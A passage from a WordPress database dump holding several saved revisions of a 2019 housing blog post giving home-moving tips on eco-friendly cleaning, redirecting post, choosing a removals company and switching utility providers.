read the label at the back, you find out that they are not as safe as they claim to be.\r\n\r\n<em>Here are some ways to be an get your house ready for sale with good quality, safe to use products.</em>\r\n\r\nReplace the equipment\r\n\r\nIf you need to change a household appliance like a stove or dishwasher, you should find a good quality replacement, not only to please the potential buyers but increase property value.\r\n<blockquote>Large appliances are great electricity consumers so try to replace them with Eco ones that save energy, and money to take that strain off potential buyers, and improve your trust with them.</blockquote>\r\n<strong>Clean efficiently using Eco products</strong>\r\n\r\nInstead of using the big name brand cleaners that contain toxic chemicals when you come to cleaning the property, windows or glass items, you can <a href=\"https://thegreenparent.co.uk/articles/read/make-your-own-cleaning-products\" target=\"_blank\">make your own cleaning mixture</a> that is both eco-friendly and safe around children and pets.\r\n\r\nYou can even make your own mixture to polish the furniture with.\r\n<h3><img class=\"aligncenter wp-image-186 size-full\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/09/cleaning-3977589_960_720.jpg\" alt=\"\" width=\"960\" height=\"639\" /></h3>\r\n<h3>Redirecting your post</h3>\r\nRedirecting your post is one of the most important things you need to do when moving house, if not done, or done incorrectly it can cause problems for longer than necessary.\r\n\r\nRedirecting can seem like a difficult process, but it is a lot easier than you think. All you need to do is go to your local post office and ask about their <a href=\"https://www.postoffice.co.uk/mail/redirection\" target=\"_blank\">redirection services</a>\r\n<h3><strong>Finding a removals company</strong></h3>\r\n<em>top tips for finding a removals company</em>\r\n<ul>\r\n <li>Always try to get at least 4 removal quotes from <a href=\"https://www.ktmollerremovals.com.au/about-us/\" target=\"_blank\">removals companies</a> and gather your moving quotes either from your local area or the area you are planning to move to.\r\nOnce you have your removal quotes to hand it is important to speak with all the removal companies in person.</li>\r\n <li>This will enable you to get a feel for them and will also give you a chance to ask them any questions especially if you have any special requirements.</li>\r\n <li>The tried and tested way of finding a reliable removal company and receiving a genuine removals quote is by asking for testimonials or checking out their website.\r\nCheck to see if they are a part of any associations.</li>\r\n <li>The removal company you get your removal quote from should have a thorough look at your current home and belongings in order to give an accurate costing.</li>\r\n <li>If you are having various removals firms to come and visit make sure you are well prepared. They will want to look over every aspect of your property.</li>\r\n <li>Factors which will change the quote include the number of stairs in the property or to the property doors if you are moving from a flat & whether there is a lift or not. They will also want to ask about access for both ends (moving from & moving to) and is a very important factor to be taken into account.</li>\r\n <li>You will need to figure out what kind of removal service you need. For example, most companies will offer an all in one service that means they will pack and move your things, providing you with all the equipment you need.</li>\r\n <li>If the house removals company you are dealing with does not have suitable insurance, make sure you check if your home contents insurance covers your move.</li>\r\n</ul>\r\n \r\n\r\n<strong>Changing your bills</strong>\r\n\r\nChanging your electric and gas providers is important to make the moving and settling in process easier.\r\n\r\nNot only could this save you money, but it will avoid confusion when it comes to bills and repairs.\r\n\r\nIt may be best to get an <a href=\"https://housing-today.co.uk/blog/the-best-way-to-choose-an-electrician\" target=\"_blank\">electrician</a> in to have a look at what you need so that they can advise you on a provider that suits you, and your need best.\r\n\r\n ','Moving home checklist: tips to ease stress','','inherit','closed','closed','','180-revision-v1','','','2019-09-13 10:00:39','2019-09-13 10:00:39','',180,'https://housing-today.co.uk/blog/180-revision-v1',0,'revision','',0),(198,1,'2019-09-13 10:01:42','2019-09-13 10:01:42','<h1>Cleaning your property</h1>\r\n<h3>Eco-friendly house cleaning</h3>\r\nWe all know how important is to use Eco-friendly, pet-friendly, harmless products, especially cleaning a house you are intending to sell, as you want to make your property available to accommodate as many people as possible.\r\n\r\nThis is obviously not always an easy task.\r\n\r\nAlthough there are many products on the market with big Eco-labels on them, when you read the label at the back, you find out that they are not as safe as they claim to be.\r\n\r\n<em>Here are some ways to be an get your house ready for sale with good quality, safe to use products.</em>\r\n\r\nReplace the equipment\r\n\r\nIf you need to change a household appliance like a stove or dishwasher, you should find a good quality replacement, not only to please the potential buyers but increase property value. Large appliances are great electricity consumers so try to replace them with Eco ones that save energy, and money to take that strain off potential buyers, and improve your trust with them.\r\n\r\n<strong>Clean efficiently using Eco products</strong>\r\n\r\nInstead of using the big name brand cleaners that contain toxic chemicals when you come to cleaning the property, windows or glass items, you can <a href=\"https://thegreenparent.co.uk/articles/read/make-your-own-cleaning-products\" target=\"_blank\">make your own cleaning mixture</a> that is both eco-friendly and safe around children and pets. You can even make your own mixture to polish the furniture with\r\n<h3><img class=\"aligncenter wp-image-186 size-full\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/09/cleaning-3977589_960_720.jpg\" alt=\"\" width=\"960\" height=\"639\" /></h3>\r\n<h3>Redirecting your post</h3>\r\nRedirecting your post is one of the most important things you need to do when moving house, if not done, or done incorrectly it can cause problems for longer than necessary.\r\n\r\nRedirecting can seem like a difficult process, but it is a lot easier than you think. All you need to do is go to your local post office and ask about their <a href=\"https://www.postoffice.co.uk/mail/redirection\" target=\"_blank\">redirection services</a>\r\n<h3><strong>Finding a removals company</strong></h3>\r\n<em>top tips for finding a removals company</em>\r\n<ul>\r\n <li>Always try to get at least 4 removal quotes from <a href=\"https://www.ktmollerremovals.com.au/about-us/\" target=\"_blank\">removals companies</a> and gather your moving quotes either from your local area or the area you are planning to move to.\r\nOnce you have your removal quotes to hand it is important to speak with all the removal companies in person.</li>\r\n <li>This will enable you to get a feel for them and will also give you a chance to ask them any questions especially if you have any special requirements.</li>\r\n <li>The tried and tested way of finding a reliable removal company and receiving a genuine removals quote is by asking for testimonials or checking out their website.\r\nCheck to see if they are a part of any associations.</li>\r\n <li>The removal company you get your removal quote from should have a thorough look at your current home and belongings in order to give an accurate costing.</li>\r\n <li>If you are having various removals firms to come and visit make sure you are well prepared. They will want to look over every aspect of your property.</li>\r\n <li>Factors which will change the quote include the number of stairs in the property or to the property doors if you are moving from a flat & whether there is a lift or not. They will also want to ask about access for both ends (moving from & moving to) and is a very important factor to be taken into account.</li>\r\n <li>You will need to figure out what kind of removal service you need. For example, most companies will offer an all in one service that means they will pack and move your things, providing you with all the equipment you need.</li>\r\n <li>If the house removals company you are dealing with does not have suitable insurance, make sure you check if your home contents insurance covers your move.</li>\r\n</ul>\r\n \r\n<h3><strong>Changing your bills</strong></h3>\r\nChanging your electric and gas providers is important to make the moving and settling in process easier. Not only could this save you money, but it will avoid confusion when it comes to bills and repairs.\r\n\r\nIt may be best to get an <a href=\"https://housing-today.co.uk/blog/the-best-way-to-choose-an-electrician\" target=\"_blank\">electrician</a> in to have a look at what you need so that they can advise you on a provider that suits you, and your need best.\r\n\r\n ','Moving home checklist: tips to ease stress','','inherit','closed','closed','','180-revision-v1','','','2019-09-13 10:01:42','2019-09-13 10:01:42','',180,'https://housing-today.co.uk/blog/180-revision-v1',0,'revision','',0),(199,1,'2019-09-13 10:02:56','2019-09-13 10:02:56','<h1>Cleaning your property</h1>\n<h3>Eco-friendly house cleaning</h3>\nWe all know how important is to use Eco-friendly, pet-friendly, harmless products, especially cleaning a house you are intending to sell, as you want to make your property available to accommodate as many people as possible.\n\nThis is obviously not always an easy task.\n\nAlthough there are many products on the market with big Eco-labels on them, when you read the label at the back, you find out that they are not as safe as they claim to be.\n\n<em>Here are some ways to be an get your house ready for sale with good quality, safe to use products.</em>\n\n<strong>Replace the equipment</strong>\n\nIf you need to change a household appliance like a stove or dishwasher, you should find a good quality replacement, not only to please the potential buyers but increase property value. Large appliances are great electricity consumers so try to replace them with Eco ones that save energy, and money to take that strain off potential buyers, and improve your trust with them.\n\n<strong>Clean efficiently using Eco products</strong>\n\nInstead of using the big name brand cleaners that contain toxic chemicals when you come to cleaning the property, windows or glass items, you can <a href=\"https://thegreenparent.co.uk/articles/read/make-your-own-cleaning-products\" target=\"_blank\">make your own cleaning mixture</a> that is both eco-friendly and safe around children and pets. You can even make your own mixture to polish the furniture with\n<h3><img class=\"aligncenter wp-image-186 size-full\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/09/cleaning-3977589_960_720.jpg\" alt=\"\" width=\"960\" height=\"639\" /></h3>\n<h3>Redirecting your post</h3>\nRedirecting your post is one of the most important things you need to do when moving house, if not done, or done incorrectly it can cause problems for longer than necessary.\n\nRedirecting can seem like a difficult process, but it is a lot easier than you think. All you need to do is go to your local post office and ask about their <a href=\"https://www.postoffice.co.uk/mail/redirection\" target=\"_blank\">redirection services</a>\n<h3><strong>Finding a removals company</strong></h3>\n<em>top tips for finding a removals company</em>\n<ul>\n <li>Always try to get at least 4 removal quotes from <a href=\"https://www.ktmollerremovals.com.au/about-us/\" target=\"_blank\">removals companies</a> and gather your moving quotes either from your local area or the area you are planning to move to.\nOnce you have your removal quotes to hand it is important to speak with all the removal companies in person.</li>\n <li>This will enable you to get a feel for them and will also give you a chance to ask them any questions especially if you have any special requirements.</li>\n <li>The tried and tested way of finding a reliable removal company and receiving a genuine removals quote is by asking for testimonials or checking out their website.\nCheck to see if they are a part of any associations.</li>\n <li>The removal company you get your removal quote from should have a thorough look at your current home and belongings in order to give an accurate costing.</li>\n <li>If you are having various removals firms to come and visit make sure you are well prepared. They will want to look over every aspect of your property.</li>\n <li>Factors which will change the quote include the number of stairs in the property or to the property doors if you are moving from a flat & whether there is a lift or not. They will also want to ask about access for both ends (moving from & moving to) and is a very important factor to be taken into account.</li>\n <li>You will need to figure out what kind of removal service you need. For example, most companies will offer an all in one service that means they will pack and move your things, providing you with all the equipment you need.</li>\n <li>If the house removals company you are dealing with does not have suitable insurance, make sure you check if your home contents insurance covers your move.</li>\n</ul>\n \n<h3><strong>Changing your bills</strong></h3>\nChanging your electric and gas providers is important to make the moving and settling in process easier. Not only could this save you money, but it will avoid confusion when it comes to bills and repairs.\n\nIt may be best to get an <a href=\"https://housing-today.co.uk/blog/the-best-way-to-choose-an-electrician\" target=\"_blank\">electrician</a> in to have a look at what you need so that they can advise you on a provider that suits you, and your need best.\n\n ','Moving home checklist: tips to ease stress','','inherit','closed','closed','','180-autosave-v1','','','2019-09-13 10:02:56','2019-09-13 10:02:56','',180,'https://housing-today.co.uk/blog/180-autosave-v1',0,'revision','',0),(201,1,'2019-09-13 10:07:57','2019-09-13 10:07:57','<h1>Cleaning your property</h1>\r\n<h3>Eco-friendly house cleaning</h3>\r\nWe all know how important is to use Eco-friendly, pet-friendly, harmless products, especially cleaning a house you are intending to sell, as you want to make your property available to accommodate as many people as possible.\r\n\r\nThis is obviously not always an easy task.\r\n<blockquote>Although there are many products on the market with big Eco-labels on them, when you read the label at the back, you find out that they are not as safe as they claim to be.</blockquote>\r\n<em>Here are some ways to be an get your house ready for sale with good quality, safe to use products.</em>\r\n\r\n<strong>Replace the equipment</strong>\r\n\r\nIf you need to change a household appliance like a stove or dishwasher, you should find a good quality replacement, not only to please the potential buyers but increase property value.\r\n\r\nLarge appliances are great electricity consumers so try to replace them with Eco ones that save energy, and money to take that strain off potential buyers, and improve your trust with them.\r\n\r\n<strong>Clean efficiently using Eco products</strong>\r\n\r\nInstead of using the big name brand cleaners that contain toxic chemicals when you come to cleaning the property, windows or glass items, you can <a href=\"https://thegreenparent.co.uk/articles/read/make-your-own-cleaning-products\" target=\"_blank\">make your own cleaning mixture</a> that is both eco-friendly and safe around children and pets.\r\n\r\nYou can even make your own mixture to polish the furniture with.\r\n<h3><img class=\"aligncenter wp-image-186 size-full\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/09/cleaning-3977589_960_720.jpg\" alt=\"\" width=\"960\" height=\"639\" /></h3>\r\n<h3>Redirecting your post</h3>\r\nRedirecting your post is one of the most important things you need to do when moving house, if not done, or done incorrectly it can cause problems for longer than necessary.\r\n\r\nRedirecting can seem like a difficult process, but it is a lot easier than you think.\r\n\r\nAll you need to do is go to your local post office and ask about their <a href=\"https://www.postoffice.co.uk/mail/redirection\" target=\"_blank\">redirection services</a>\r\n<h3><strong>Finding a removals company</strong></h3>\r\n<em>top tips for finding a removals company</em>\r\n<ul>\r\n <li>Always try to get at least 4 removal quotes from <a href=\"https://www.ktmollerremovals.com.au/about-us/\" target=\"_blank\">removals companies</a> and gather your moving quotes either from your local area or the area you are planning to move to.\r\nOnce you have your removal quotes to hand it is important to speak with all the removal companies in person.</li>\r\n <li>This will enable you to get a feel for them and will also give you a chance to ask them any questions especially if you have any special requirements.</li>\r\n <li>The tried and tested way of finding a reliable removal company and receiving a genuine removals quote is by asking for testimonials or checking out their website.\r\nCheck to see if they are a part of any associations.</li>\r\n <li>The removal company you get your removal quote from should have a thorough look at your current home and belongings in order to give an accurate costing.</li>\r\n <li>If you are having various removals firms to come and visit make sure you are well prepared. They will want to look over every aspect of your property.</li>\r\n <li>Factors which will change the quote include the number of stairs in the property or to the property doors if you are moving from a flat & whether there is a lift or not. They will also want to ask about access for both ends (moving from & moving to) and is a very important factor to be taken into account.</li>\r\n <li>You will need to figure out what kind of removal service you need. For example, most companies will offer an all in one service that means they will pack and move your things, providing you with all the equipment you need.</li>\r\n <li>If the house removals company you are dealing with does not have suitable insurance, make sure you check if your home contents insurance covers your move.</li>\r\n</ul>\r\n \r\n<h3><strong>Changing your bills</strong></h3>\r\nChanging your electric and gas providers is important to make the moving and settling in process easier.\r\n\r\nNot only could this save you money, but it will avoid confusion when it comes to bills and repairs.\r\n\r\nIt may be best to get an <a href=\"https://housing-today.co.uk/blog/the-best-way-to-choose-an-electrician\" target=\"_blank\">electrician</a> in to have a look at what you need so that they can advise you on a provider that suits you, and your need best.\r\n\r\n ','Moving home checklist: tips to ease stress','','inherit','closed','closed','','180-revision-v1','','','2019-09-13 10:07:57','2019-09-13 10:07:57','',180,'https://housing-today.co.uk/blog/180-revision-v1',0,'revision','',0),(202,1,'2019-09-13 10:09:02','2019-09-13 10:09:02','<h1>Cleaning your property</h1>\r\n<h3>Eco-friendly house cleaning</h3>\r\nWe all know how important is to use Eco-friendly, pet-friendly, harmless products.\r\n\r\nCleaning a house you are intending to sell this is especially important, as you want to make your property available to accommodate as many people as possible.\r\n\r\nThis is obviously not always an easy task.\r\n<blockquote>Although there are many products on the market with big Eco-labels on them, when you read the label at the back, you find out that they are not as safe as they claim to be.</blockquote>\r\n<em>Here are some ways to be an get your house ready for sale with good quality, safe to use products.</em>\r\n\r\n<strong>Replace the equipment</strong>\r\n\r\nIf you need to change a household appliance like a stove or dishwasher, you should find a good quality replacement, not only to please the potential buyers but increase property value.\r\n\r\nLarge appliances are great electricity consumers so try to replace them with Eco ones that save energy, and money to take that strain off potential buyers, and improve your trust with them.\r\n\r\n<strong>Clean efficiently using Eco products</strong>\r\n\r\nInstead of using the big name brand cleaners that contain toxic chemicals when you come to cleaning the property, windows or glass items, you can <a href=\"https://thegreenparent.co.uk/articles/read/make-your-own-cleaning-products\" target=\"_blank\">make your own cleaning mixture</a> that is both eco-friendly and safe around children and pets.\r\n\r\nYou can even make your own mixture to polish the furniture with.\r\n<h3><img class=\"aligncenter wp-image-186 size-full\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/09/cleaning-3977589_960_720.jpg\" alt=\"\" width=\"960\" height=\"639\" /></h3>\r\n<h3>Redirecting your post</h3>\r\nRedirecting your post is one of the most important things you need to do when moving house, if not done, or done incorrectly it can cause problems for longer than necessary.\r\n\r\nRedirecting can seem like a difficult process, but it is a lot easier than you think.\r\n\r\nAll you need to do is go to your local post office and ask about their <a href=\"https://www.postoffice.co.uk/mail/redirection\" target=\"_blank\">redirection services</a>\r\n<h3><strong>Finding a removals company</strong></h3>\r\n<em>top tips for finding a removals company</em>\r\n<ul>\r\n <li>Always try to get at least 4 removal quotes from <a href=\"https://www.ktmollerremovals.com.au/about-us/\" target=\"_blank\">removals companies</a> and gather your moving quotes either from your local area or the area you are planning to move to.\r\nOnce you have your removal quotes to hand it is important to speak with all the removal companies in person.</li>\r\n <li>This will enable you to get a feel for them and will also give you a chance to ask them any questions especially if you have any special requirements.</li>\r\n <li>The tried and tested way of finding a reliable removal company and receiving a genuine removals quote is by asking for testimonials or checking out their website.\r\nCheck to see if they are a part of any associations.</li>\r\n <li>The removal company you get your removal quote from should have a thorough look at your current home and belongings in order to give an accurate costing.</li>\r\n <li>If you are having various removals firms to come and visit make sure you are well prepared. They will want to look over every aspect of your property.</li>\r\n <li>Factors which will change the quote include the number of stairs in the property or to the property doors if you are moving from a flat & whether there is a lift or not. They will also want to ask about access for both ends (moving from & moving to) and is a very important factor to be taken into account.</li>\r\n <li>You will need to figure out what kind of removal service you need. For example, most companies will offer an all in one service that means they will pack and move your things, providing you with all the equipment you need.</li>\r\n <li>If the house removals company you are dealing with does not have suitable insurance, make sure you check if your home contents insurance covers your move.</li>\r\n</ul>\r\n \r\n<h3><strong>Changing your bills</strong></h3>\r\nChanging your electric and gas providers is important to make the moving and settling in process easier.\r\n\r\nNot only could this save you money, but it will avoid confusion when it comes to bills and repairs.\r\n\r\nIt may be best to get an <a href=\"https://housing-today.co.uk/blog/the-best-way-to-choose-an-electrician\" target=\"_blank\">electrician</a> in to have a look at what you need so that they can advise you on a provider that suits you, and your need best.\r\n\r\n ','Moving home checklist: tips to ease stress','','inherit','closed','closed','','180-revision-v1','','','2019-09-13 10:09:02','2019-09-13 10:09:02','',180,'https://housing-today.co.uk/blog/180-revision-v1',0,'revision','',0),(203,1,'2019-09-13 10:09:47','2019-09-13 10:09:47','<h1>Cleaning your property</h1>\r\n<h3>Eco-friendly house cleaning</h3>\r\nWe all know how important is to use Eco-friendly, pet-friendly, harmless products.\r\n\r\nCleaning a house you are intending to sell this is especially important, as you want to make your property available to accommodate as many people as possible.\r\n\r\nThis is obviously not always an easy task.\r\n<blockquote>Although there are many products on the market with big Eco-labels on them, when you read the label at the back, you find out that they are not as safe as they claim to be.</blockquote>\r\n<em>Here are some ways to be an get your house ready for sale with good quality, safe to use products.</em>\r\n\r\n<strong>Replace the equipment</strong>\r\n\r\nIf you need to change a household appliance like a stove or dishwasher, you should find a good quality replacement, not only to please the potential buyers but increase property value.\r\n\r\nLarge appliances are great electricity consumers so try to replace them with Eco ones that save energy, and money to take that strain off potential buyers, and improve your trust with them.\r\n\r\n<strong>Clean efficiently using Eco products</strong>\r\n\r\nInstead of using the big name brand cleaners that contain toxic chemicals when you come to cleaning the property, windows or glass items, you can <a href=\"https://thegreenparent.co.uk/articles/read/make-your-own-cleaning-products\" target=\"_blank\">make your own cleaning mixture</a> that is both eco-friendly and safe around children and pets.\r\n\r\nYou can even make your own mixture to polish the furniture with.\r\n<h3><img class=\"aligncenter wp-image-186 size-full\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/09/cleaning-3977589_960_720.jpg\" alt=\"\" width=\"960\" height=\"639\" /></h3>\r\n<h3>Redirecting your post</h3>\r\nRedirecting your post is one of the most important things you need to do when moving house, if not done, or done incorrectly it can cause problems for longer than necessary.\r\n\r\nRedirecting can seem like a difficult process, but it is a lot easier than you think.\r\n\r\nAll you need to do is go to your local post office and ask about their <a href=\"https://www.postoffice.co.uk/mail/redirection\" target=\"_blank\">redirection services</a>\r\n<h3><strong>Finding a removals company</strong></h3>\r\n<em>top tips for finding a removals company</em>\r\n<ul>\r\n <li>Always try to get at least 4 removal quotes from <a href=\"https://www.ktmollerremovals.com.au/about-us/\" target=\"_blank\">removals companies</a> and gather your moving quotes either from your local area or the area you are planning to move to.\r\nOnce you have your removal quotes to hand it is important to speak with all the removal companies in person.</li>\r\n <li>This will enable you to get a feel for them and will also give you a chance to ask them any questions especially if you have any special requirements.</li>\r\n <li>The tried and tested way of finding a reliable removal company and receiving a genuine removals quote is by asking for testimonials or checking out their website.\r\nCheck to see if they are a part of any associations.</li>\r\n <li>The removal company you get your removal quote from should have a thorough look at your current home and belongings in order to give an accurate costing.</li>\r\n <li>If you are having various removals firms to come and visit make sure you are well prepared. They will want to look over every aspect of your property.</li>\r\n <li>Factors which will change the quote include the number of stairs in the property or to the property doors if you are moving from a flat & whether there is a lift or not. They will also want to ask about access for both ends (moving from & moving to) and is a very important factor to be taken into account.</li>\r\n <li>You will need to figure out what kind of removal service you need. For example, most companies will offer an all in one service that means they will pack and move your things, providing you with all the equipment you need.</li>\r\n <li>If the house removals company you are dealing with does not have suitable insurance, make sure you check if your home contents insurance covers your move.</li>\r\n</ul>\r\n<strong>Changing your bills</strong>\r\n\r\nChanging your electric and gas providers is important to make the moving and settling in process easier.\r\n\r\nNot only could this save you money, but it will avoid confusion when it comes to bills and repairs.\r\n\r\nIt may be best to get an <a href=\"https://housing-today.co.uk/blog/the-best-way-to-choose-an-electrician\" target=\"_blank\">electrician</a> in to have a look at what you need so that they can advise you on a provider that suits you, and your need best.\r\n\r\n ','Moving home checklist: tips to ease stress','','inherit','closed','closed','','180-revision-v1','','','2019-09-13 10:09:47','2019-09-13 10:09:47','',180,'https://housing-today.co.uk/blog/180-revision-v1',0,'revision','',0),(204,1,'2019-09-13 10:10:02','2019-09-13 10:10:02','<h1>Cleaning your property</h1>\r\n<h3>Eco-friendly house cleaning</h3>\r\nWe all know how important is to use Eco-friendly, pet-friendly, harmless products.\r\n\r\nCleaning a house you are intending to sell this is especially important, as you want to make your property available to accommodate as many people as possible.\r\n\r\nThis is obviously not always an easy task.\r\n<blockquote>Although there are many products on the market with big Eco-labels on them, when you read the label at the back, you find out that they are not as safe as they claim to be.</blockquote>\r\n<em>Here are some ways to be an get your house ready for sale with good quality, safe to use products.</em>\r\n\r\n<strong>Replace the equipment</strong>\r\n\r\nIf you need to change a household appliance like a stove or dishwasher, you should find a good quality replacement, not only to please the potential buyers but increase property value.\r\n\r\nLarge appliances are great electricity consumers so try to replace them with Eco ones that save energy, and money to take that strain off potential buyers, and improve your trust with them.\r\n\r\n<strong>Clean efficiently using Eco products</strong>\r\n\r\nInstead of using the big name brand cleaners that contain toxic chemicals when you come to cleaning the property, windows or glass items, you can <a href=\"https://thegreenparent.co.uk/articles/read/make-your-own-cleaning-products\" target=\"_blank\">make your own cleaning mixture</a> that is both eco-friendly and safe around children and pets.\r\n\r\nYou can even make your own mixture to polish the furniture with.\r\n<h3><img class=\"aligncenter wp-image-186 size-full\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/09/cleaning-3977589_960_720.jpg\" alt=\"\" width=\"960\" height=\"639\" /></h3>\r\n<h3>Redirecting your post</h3>\r\nRedirecting your post is one of the most important things you need to do when moving house, if not done, or done incorrectly it can cause problems for longer than necessary.\r\n\r\nRedirecting can seem like a difficult process, but it is a lot easier than you think.\r\n\r\nAll you need to do is go to your local post office and ask about their <a href=\"https://www.postoffice.co.uk/mail/redirection\" target=\"_blank\">redirection services</a>\r\n<h3><strong>Finding a removals company</strong></h3>\r\n<em>top tips for finding a removals company</em>\r\n<ul>\r\n <li>Always try to get at least 4 removal quotes from <a href=\"https://www.ktmollerremovals.com.au/about-us/\" target=\"_blank\">removals companies</a> and gather your moving quotes either from your local area or the area you are planning to move to.\r\nOnce you have your removal quotes to hand it is important to speak with all the removal companies in person.</li>\r\n <li>This will enable you to get a feel for them and will also give you a chance to ask them any questions especially if you have any special requirements.</li>\r\n <li>The tried and tested way of finding a reliable removal company and receiving a genuine removals quote is by asking for testimonials or checking out their website.\r\nCheck to see if they are a part of any associations.</li>\r\n <li>The removal company you get your removal quote from should have a thorough look at your current home and belongings in order to give an accurate costing.</li>\r\n <li>If you are having various removals firms to come and visit make sure you are well prepared. They will want to look over every aspect of your property.</li>\r\n <li>Factors which will change the quote include the number of stairs in the property or to the property doors if you are moving from a flat & whether there is a lift or not. They will also want to ask about access for both ends (moving from & moving to) and is a very important factor to be taken into account.</li>\r\n <li>You will need to figure out what kind of removal service you need. For example, most companies will offer an all in one service that means they will pack and move your things, providing you with all the equipment you need.</li>\r\n <li>If the house removals company you are dealing with does not have suitable insurance, make sure you check if your home contents insurance covers your move.</li>\r\n</ul>\r\n<h3><strong>Changing your bills</strong></h3>\r\nChanging your electric and gas providers is important to make the moving and settling in process easier.\r\n\r\nNot only could this save you money, but it will avoid confusion when it comes to bills and repairs.\r\n\r\nIt may be best to get an <a href=\"https://housing-today.co.uk/blog/the-best-way-to-choose-an-electrician\" target=\"_blank\">electrician</a> in to have a look at what you need so that they can advise you on a provider that suits you, and your need best.\r\n\r\n ','Moving home checklist: tips to ease stress','','inherit','closed','closed','','180-revision-v1','','','2019-09-13 10:10:02','2019-09-13 10:10:02','',180,'https://housing-today.co.uk/blog/180-revision-v1',0,'revision','',0),(205,1,'2019-09-13 10:11:12','2019-09-13 10:11:12','<h1>Cleaning your property</h1>\r\n<h3>Eco-friendly house cleaning</h3>\r\nWe all know how important is to use Eco-friendly, pet-friendly, harmless products.\r\n\r\nCleaning a house you are intending to sell this is especially important, as you want to make your property available to accommodate as many people as possible.\r\n\r\nThis is obviously not always an easy task.\r\n<blockquote>Although there are many products on the market with big Eco-labels on them, when you read the label at the back, you find out that they are not as safe as they claim to be.</blockquote>\r\n<h3>Here are some ways to be an get your house ready for sale with good quality, safe to use products.</h3>\r\n<strong>Replace the equipment</strong>\r\n\r\nIf you need to change a household appliance like a stove or dishwasher, you should find a good quality replacement, not only to please the potential buyers but increase property value.\r\n\r\nLarge appliances are great electricity consumers so try to replace them with Eco ones that save energy, and money to take that strain off potential buyers, and improve your trust with them.\r\n\r\n<strong>Clean efficiently using Eco products</strong>\r\n\r\nInstead of using the big name brand cleaners that contain toxic chemicals when you come to cleaning the property, windows or glass items, you can <a href=\"https://thegreenparent.co.uk/articles/read/make-your-own-cleaning-products\" target=\"_blank\">make your own cleaning mixture</a> that is both eco-friendly and safe around children and pets.\r\n\r\nYou can even make your own mixture to polish the furniture with.\r\n<h3><img class=\"aligncenter wp-image-186 size-full\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/09/cleaning-3977589_960_720.jpg\" alt=\"\" width=\"960\" height=\"639\" /></h3>\r\n<h3>Redirecting your post</h3>\r\nRedirecting your post is one of the most important things you need to do when moving house, if not done, or done incorrectly it can cause problems for longer than necessary.\r\n\r\nRedirecting can seem like a difficult process, but it is a lot easier than you think.\r\n\r\nAll you need to do is go to your local post office and ask about their <a href=\"https://www.postoffice.co.uk/mail/redirection\" target=\"_blank\">redirection services</a>\r\n<h3><strong>Finding a removals company</strong></h3>\r\n<em>top tips for finding a removals company</em>\r\n<ul>\r\n <li>Always try to get at least 4 removal quotes from <a href=\"https://www.ktmollerremovals.com.au/about-us/\" target=\"_blank\">removals companies</a> and gather your moving quotes either from your local area or the area you are planning to move to.\r\nOnce you have your removal quotes to hand it is important to speak with all the removal companies in person.</li>\r\n <li>This will enable you to get a feel for them and will also give you a chance to ask them any questions especially if you have any special requirements.</li>\r\n <li>The tried and tested way of finding a reliable removal company and receiving a genuine removals quote is by asking for testimonials or checking out their website.\r\nCheck to see if they are a part of any associations.</li>\r\n <li>The removal company you get your removal quote from should have a thorough look at your current home and belongings in order to give an accurate costing.</li>\r\n <li>If you are having various removals firms to come and visit make sure you are well prepared. They will want to look over every aspect of your property.</li>\r\n <li>Factors which will change the quote include the number of stairs in the property or to the property doors if you are moving from a flat & whether there is a lift or not. They will also want to ask about access for both ends (moving from & moving to) and is a very important factor to be taken into account.</li>\r\n <li>You will need to figure out what kind of removal service you need. For example, most companies will offer an all in one service that means they will pack and move your things, providing you with all the equipment you need.</li>\r\n <li>If the house removals company you are dealing with does not have suitable insurance, make sure you check if your home contents insurance covers your move.</li>\r\n</ul>\r\n<h3><strong>Changing your bills</strong></h3>\r\nChanging your electric and gas providers is important to make the moving and settling in process easier.\r\n\r\nNot only could this save you money, but it will avoid confusion when it comes to bills and repairs.\r\n\r\nIt may be best to get an <a href=\"https://housing-today.co.uk/blog/the-best-way-to-choose-an-electrician\" target=\"_blank\">electrician</a> in to have a look at what you need so that they can advise you on a provider that suits you, and your need best.\r\n\r\n ','Moving home checklist: tips to ease stress','','inherit','closed','closed','','180-revision-v1','','','2019-09-13 10:11:12','2019-09-13 10:11:12','',180,'https://housing-today.co.uk/blog/180-revision-v1',0,'revision','',0),(206,1,'2019-09-13 10:13:58','2019-09-13 10:13:58','<h1>Cleaning your property</h1>\r\n<h3>Eco-friendly house cleaning</h3>\r\nWe all know how important is to use Eco-friendly, pet-friendly, harmless products.\r\n\r\nCleaning a house you are intending to sell this is especially important, as you want to make your property available to accommodate as many people as possible.\r\n\r\nThis is obviously not always an easy task.\r\n<blockquote>Although there are many products on the market with big Eco-labels on them, when you read the label at the back, you find out that they are not as safe as they claim to be.</blockquote>\r\n<h3>Here are some ways to house ready for sale:</h3>\r\n<strong>Replace the equipment</strong>\r\n\r\nIf you need to change a household appliance like a stove or dishwasher, you should find a good quality replacement, not only to please the potential buyers but increase property value.\r\n\r\nLarge appliances are great electricity consumers so try to replace them with Eco ones that save energy, and money to take that strain off potential buyers, and improve your trust with them.\r\n\r\n<strong>Clean efficiently using Eco products</strong>\r\n\r\nInstead of using the big name brand cleaners that contain toxic chemicals when you come to cleaning the property, windows or glass items, you can <a href=\"https://thegreenparent.co.uk/articles/read/make-your-own-cleaning-products\" target=\"_blank\">make your own cleaning mixture</a> that is both eco-friendly and safe around children and pets.\r\n\r\nYou can even make your own mixture to polish the furniture with.\r\n<h3><img class=\"aligncenter wp-image-186 size-full\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/09/cleaning-3977589_960_720.jpg\" alt=\"\" width=\"960\" height=\"639\" /></h3>\r\n<h3>Redirecting your post</h3>\r\nRedirecting your post is one of the most important things you need to do when moving house, if not done, or done incorrectly it can cause problems for longer than necessary.\r\n\r\nRedirecting can seem like a difficult process, but it is a lot easier than you think.\r\n\r\nAll you need to do is go to your local post office and ask about their <a href=\"https://www.postoffice.co.uk/mail/redirection\" target=\"_blank\">redirection services</a>\r\n<h3><strong>Finding a removals company</strong></h3>\r\n<em>top tips for finding a removals company</em>\r\n<ul>\r\n <li>Always try to get at least 4 removal quotes from <a href=\"https://www.ktmollerremovals.com.au/about-us/\" target=\"_blank\">removals companies</a> and gather your moving quotes either from your local area or the area you are planning to move to.\r\nOnce you have your removal quotes to hand it is important to 